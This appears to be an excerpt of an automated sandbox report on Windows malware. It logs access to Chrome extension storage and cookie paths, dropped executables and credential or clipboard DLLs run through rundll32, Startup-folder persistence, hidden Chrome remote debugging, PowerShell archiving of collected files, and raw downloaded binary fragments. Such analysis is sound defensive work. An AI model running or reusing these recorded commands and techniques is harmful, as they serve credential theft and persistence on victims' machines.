file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\apenkfbbpmhihehmihndmmcdanacolnh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\ciojocpkclfflombbcfigcijjcbkmhaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opfgelmcmbiajamepnmloijbpoleiama\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sv\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\fa\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\naepdomgkenhinolocfifgehidddafch\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch\CURRENT

Creates executable files on the filesystem (30 events)

file	C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1N22O8.exe
file	C:\Users\test22\AppData\Roaming\TypeName.exe
file	C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
file	C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe
file	C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
file	C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1
file	C:\ProgramData\mozglue.dll
file	C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3H65J.exe
file	C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
file	C:\ProgramData\vcruntime140.dll
file	C:\Users\test22\AppData\Local\Temp\go.pub.bat
file	C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe
file	C:\Users\test22\AppData\Local\Temp\353090\Seat.com
file	C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\67cb736da8518.vbs
file	C:\ProgramData\msvcp140.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
file	C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe
file	C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe
file	C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2q1116.exe
file	C:\ProgramData\freebl3.dll
file	C:\ProgramData\softokn3.dll
file	C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
file	C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe
file	C:\ProgramData\nss3.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\J5j65.exe
file	C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\10119590141\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	Powershell.exe -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
cmdline	cmd.exe /c 67cb736da8518.vbs
cmdline	C:\Windows\System32\cmd.exe /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline	powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
cmdline	"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"

Drops a binary and executes it (13 events)

file	C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe
file	C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
file	C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe
file	C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
file	C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
file	C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
file	C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
file	C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe
file	C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
file	C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe
file	C:\Users\test22\AppData\Local\Temp\353090\Seat.com
file	C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\67cb736da8518.vbs

Drops an executable to the user AppData folder (12 events)

file	C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe
file	C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe
file	C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe
file	C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\353090\Seat.com
file	C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe
file	C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe
file	C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe
file	C:\Users\test22\AppData\Roaming\TypeName.exe
file	C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe
file	C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe
file	C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

A process created a hidden window (20 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 8, 2025, 12:08 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe	1	1
ShellExecuteExW March 8, 2025, 12:08 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe	1	1
ShellExecuteExW March 8, 2025, 12:08 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: Powershell.exe parameters: -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1" filepath: Powershell.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe	1	1
ShellExecuteExW March 8, 2025, 12:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe	1	1
ShellExecuteExW March 8, 2025, 12:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe	1	1
ShellExecuteExW March 8, 2025, 12:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe	1	1
ShellExecuteExW March 8, 2025, 12:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe	1	1
CreateProcessInternalW March 8, 2025, 12:08 p.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: track: 0 command_line: C:\Program Files\Google\Chrome\Application\chrome.exe --remote-debugging-port=9229 --profile-directory="Default" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000		0
ShellExecuteExW March 8, 2025, 12:08 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe	1	1
ShellExecuteExW March 8, 2025, 12:08 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW March 8, 2025, 12:09 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c expand Go.pub Go.pub.bat & Go.pub.bat filepath: C:\Windows\System32\cmd.exe	1	1
ShellExecuteExW March 8, 2025, 12:10 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (22 events)

Time & API	Arguments	Status	Return
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x000003d8 process_name: pw.exe process_identifier: 1684	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x000003d8 process_name: taskhost.exe process_identifier: 800	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x000003d8 process_name: conhost.exe process_identifier: 316	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x000003d8 process_name: SearchFilterHost.exe process_identifier: 1508	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x000003d8 process_name: rapes.exe process_identifier: 2356	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x000003d8 process_name: 3H65J.exe process_identifier: 2552	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x00000598 process_name: svchost.exe process_identifier: 2976	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x00000598 process_name: mscorsvw.exe process_identifier: 3004	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x00000598 process_name: mscorsvw.exe process_identifier: 3048	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x0000000000000128 process_name: conhost.exe process_identifier: 2564	1	1
Process32NextW March 8, 2025, 12:08 p.m.	snapshot_handle: 0x0000000000000128 process_name: rundll32.exe process_identifier: 2208	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: powershell.exe process_identifier: 296	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: conhost.exe process_identifier: 2436	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: rundll32.exe process_identifier: 1688	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: cmd.exe process_identifier: 2808	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: conhost.exe process_identifier: 2816	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: ADFoyxP.exe process_identifier: 2028	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: cmd.exe process_identifier: 1800	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: conhost.exe process_identifier: 2260	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: Seat.com process_identifier: 1972	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: inject-x86.exe process_identifier: 1572	1	1
Process32NextW March 8, 2025, 12:09 p.m.	snapshot_handle: 0x0000015c process_name: 9hUDDVk.exe process_identifier: 1200	1	1

An executable file was downloaded by the processes rapes.exe, 3h65j.exe, gxtuum.exe (21 events)

Time & API	Arguments	Status	Return
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ñ¶BS×,×,×,¼/×,¼)/×,Ç¢(×,Ç¢/×,Ç¢)Ì×,¤Ñ×,¼(×,¼-×,×-g×,Y¢%×,Y¢Ó×,Y¢.×,Rich×,PEL$Ëgàò·@0@EÈÐààÄEØá8ãâ@8.textêðò `.rdatarHJö@@.dataÜm`,@@À.rsrcàÐl@@.relocÄEàFn@BhÐÉDèYÃÌÌÌÌhpÉDèYÃÌÌÌÌj hÔÏE¹dnFè/h0ÊDèæYÃÌÌÌj høÏE¹tFèÿ.hÊDèÆYÃÌÌÌjhÐE¹TuFèß.hðÊDè¦YÃÌÌÌj h$ÐE¹´oFè¿.hPËDèYÃÌÌÌjhHÐE¹LtFè.h°ËDèfYÃÌÌÌjh\ÐE¹mFè.hÌDèFYÃÌÌÌjh{ÎE¹$uFè_.hpÌDè&YÃÌÌÌjh{ÎE¹uFè?.hÐÌDèYÃÌÌÌjh{ÎE¹ÌoFè.h0ÍDèæYÃÌÌÌjh{ÎE¹mFèÿ-hÍDèÆYÃÌÌÌjh\|ÐE¹nFèß-hðÍDè¦YÃÌÌÌjhÐE¹8xFè¿-hPÎDèYÃÌÌÌjhÐE¹ÜtFè-h°ÎDèfYÃÌÌÌjh ÐE¹llFè-hÏDèFYÃÌÌÌjh¬ÐE¹\|tFè_-hpÏDè&YÃÌÌÌjhÀÐE¹\pFè?-hÐÏDèYÃÌÌÌjDhØÐE¹ØwFè-h0ÐDèæYÃÌÌÌj\h ÑE¹ToFèÿ,hÐDèÆYÃÌÌÌjhÑE¹tpFèß,hðÐDè¦YÃÌÌÌjhÑE¹lFè¿,hPÑDèYÃÌÌÌjhÑE¹rFè,h°ÑDèfYÃÌÌÌj<h´ÑE¹ÜkFè,hÒDèFYÃÌÌÌjhôÑE¹ÄkFè_,hpÒDè&YÃÌÌÌjhÒE¹xFè?,hÐÒDèYÃÌÌÌjXhÒE¹LqFè,h0ÓDèæYÃÌÌÌjhtÒE¹°xFèÿ+hÓDèÆYÃÌÌÌjhÒE¹DvFèß+hðÓDè¦YÃÌÌÌjhÒE¹ÀwFè¿+hPÔDèYÃÌÌÌjh¤ÒE¹älFè+h°ÔDèfYÃÌÌÌjh¬ÒE¹TrFè+hÕDèFYÃÌÌÌjh´ÒE¹DsFè_+hpÕDè&YÃÌÌÌjh¼ÒE¹ÔsFè?+hÐÕDèYÃÌÌÌjhÄÒE¹<lFè+h0ÖDèæYÃÌÌÌjhÌÒE¹´uFèÿhÖDèÆYÃÌÌÌjhÔÒE¹\|qFèßhðÖDè¦YÃÌÌÌjhÜÒE¹ürFè¿hP×DèYÃÌÌÌjhäÒE¹rFèh°×DèfYÃÌÌÌjhìÒE¹xwFèhØDèFYÃÌÌÌjhôÒE¹¤sFè_hpØDè&YÃÌÌÌjhüÒE¹hxFè?hÐØDèYÃÌÌÌjhÓE¹<uFèh0ÙDèæYÃÌÌÌjhÓE¹ÌlFèÿ)hÙDèÆYÃÌÌÌjhÓE¹ülFèß)hðÙDè¦YÃÌÌÌjh0ÓE¹,mFè¿)hPÚDèYÃÌÌÌjh@ÓE¹ÄnFè)h°ÚDèfYÃÌÌÌjhPÓE¹xFè)hÛDèFYÃÌÌÌjhXÓE¹øxFè_)hpÛDè&YÃÌÌÌjh`ÓE¹ÌuFè?)hÐÛDèYÃÌÌÌjhhÓE¹¨wFè)h0ÜDèæYÃÌÌÌjhpÓE¹nFèÿ(hÜDèÆYÃÌÌÌjh\|ÓE¹(yFèß(hðÜDè¦YÃÌÌÌjhÓE¹\mFè¿(hPÝDèYÃÌÌÌjhÓE¹ìpFè(h°ÝDèfYÃÌÌÌjh¤ÓE¹ìmFè(hÞDèFYÃÌÌÌjh¬ÓE¹$oFè_(hpÞDè&YÃÌÌÌjh´ÓE¹dqFè?(hÐÞDèYÃÌÌÌjh¼ÓE¹loFè(h0ßDèæYÃÌÌÌjhÄÓE¹ xFèÿ'hßDèÆYÃÌÌÌjhÌÓE¹uFèß'hðßDè¦YÃÌÌÌjhØÓE¹LnFè¿'hPàDèYÃÌÌÌjhàÓE¹tFè'h°àDèfYÃÌÌÌjhèÓE¹4tFè'háDèFYÃÌÌÌjhøÓE¹ÔpFè_'hpáDè&YÃÌÌÌjhÔE¹lFè?'hÐáDèYÃÌÌÌjhÔE¹ÔvFè'h0âDèæYÃÌÌÌjhÔE¹vFèÿ&hâDèÆYÃÌÌÌjhÔE¹¼pFèß&hðâDè¦YÃÌÌÌjh$ÔE¹xFè¿&hPãDèYÃÌÌÌjh8ÔE¹¤pFè&h°ãDèfYÃÌÌÌjhLÔE¹wFè&häDèFYÃÌÌÌjhlÔE¹pFè_&hpäDè&YÃÌÌÌjhÔE¹\|nFè?&hÐäDèYÃÌÌÌjhÔE¹dtFè&h0åDèæYÃÌÌÌjh¤ÔE¹ôqFèÿ%håDèÆYÃÌÌÌjh¼ÔE¹@yFèß%hðåDè¦YÃÌÌÌjhÈÔE¹wFè¿%hPæDèYÃÌÌÌjhàÔE¹TlFè%h°æDèfYÃÌÌÌjhôÔE¹oFè%hçDèFYÃÌÌÌjhüÔE¹qFè_%hpçDè&YÃÌÌÌjhÕE¹ÜnFè?%hÐçDèYÃÌÌÌjh,ÕE¹qFè%h0èDèæYÃÌÌÌjh8ÕE¹rFèÿ$hèDèÆYÃÌÌÌjhDÕE¹¼vFèß$hðèDè¦YÃÌÌÌjhPÕE¹4qFè¿$hPéDèYÃÌÌÌjhdÕE¹ðwFè$h°éDèfYÃÌÌÌjhxÕE¹yFè$hêDèFYÃÌÌÌjhÕE¹luFè_$hpêDè&YÃÌÌÌj@hÕE¹üoFè?$hÐêDèYÃÌÌÌjhÌÕE¹lrFè$h0ëDèæYÃÌÌÌjLhØÕE¹ÄqFèÿ#hëDèÆYÃÌÌÌj<h(ÖE¹¤mFèß#hðëDè¦YÃÌÌÌjhhÖE¹ìsFè¿#hPìDèYÃÌÌÌjhxÖE¹<rFè#h°ìDèfYÃÌÌÌjhÖE¹¬qFè#híDèFYÃÌÌÌjhÖE¹tFè_#hpíDè&YÃÌÌÌ request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELSÉÀgàð²I@°Iv @W kðø! @à.rsrcð@À.idata @À Ð)0@àwnvsgzkdp0p@àvzzmrlzqpI@à.taggant0I"@à request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win64 $7PEdÜgð"JHVXH@À þç@ PRàQ¬U°YGðUì²ZÈfRLepR(0öQ@R.textÌIHJH `.datah`HNH@À.bssÜåðOÀ.idata¬UàQVÒO@À.didata@R(P@À.edataPR8P@@.tlsp`RÀ.rdatampR:P@@.relocDeRf<P@B.pdataì²ðU´¢S@@.rsrcG°YGVW@@`gød@@@Boolean@FalseTrueSystem@@AnsiCharÿ`@ Charÿÿ@ShortIntÿÿÿ @SmallIntÿÿÿÀ@Integerÿÿÿà@Byteÿ@Wordÿÿ @Cardinalÿÿÿÿ@@Pointer`@Int64ÿÿÿÿÿÿÿ@UInt64ÿÿÿÿÿÿÿÿ°@ NativeIntÿÿÿÿÿÿÿØ@ NativeUIntÿÿÿÿÿÿÿÿ@Single@Extended0@DoubleH@Comp`@Currencyx@ShortStringÿ@ PAnsiChar8@°@ PWideCharX@Ð@ByteBoolÿÿÿÈ@FalseTrueSystem@WordBoolÿÿÿ@FalseTrueSystem@@LongBoolÿÿÿ8@FalseTrueSystemx@string@ WideString¨@ AnsiStringÀ@VariantØ@ PFixedUInt@ø@TClass°%@@HRESULTÿÿÿ8@PGUIDP@X@TGUID@D1ø@D2ø@D3D4 _A&op_Equality@P@LeftP@RightÀ_A&op_Inequality@P@LeftP@Right Ð`AEmptyP@ à_ACreateP@Data@ BigEndian `ACreateP@Ø@Data@AStartIndex@ BigEndian@PInterfaceEntry8@@@TInterfaceEntry(P@IID8@VTable¸@IOffset@_FillerÐ@ ImplGetterð@PInterfaceTable@@TInterfaceTable¸@ EntryCount@_FillerEntries@TMethod8@Code8@Data0Ã@&op_Equality@@Left@RightPÃ@&op_Inequality@@Left@RightÃ@&op_GreaterThan@@Left@RightÀÃ@&op_GreaterThanOrEqual@@Left@Right@Ä@&op_LessThan@@Left@RightpÄ@&op_LessThanOrEqual@@Left@RightX@¸%@X@@pÇ@Ç@pÌ@`Ì@ Ì@°Ì@ÀÌ@Ì@°Â@àÂ@Å@Ã@Ã@ Ã@%"@DñÿT@Bñÿ@Bñÿ¹@Cñÿ@BñÿB@Bñÿw@Cñÿ»@Cñÿ@Cñÿ;@Cñÿp@Cñÿ¨@Cñÿô@Cñÿ?@Cñÿ@Cñÿä@Cñÿ1 @Bñÿ{ @BñÿÅ @Bñÿ!@Cñÿm!@Cñÿª!@Cñÿí!@Cñÿ1"@Jòÿt"@Jóÿ«"@Jôÿî"@Jõÿ]#@Jöÿ#@J÷ÿ×#@Jøÿ $@Jùÿo$@Kúÿ¦$@JûÿÞ$@Müÿ%@Jýÿ request_handle: 0x00cc000c	1	1
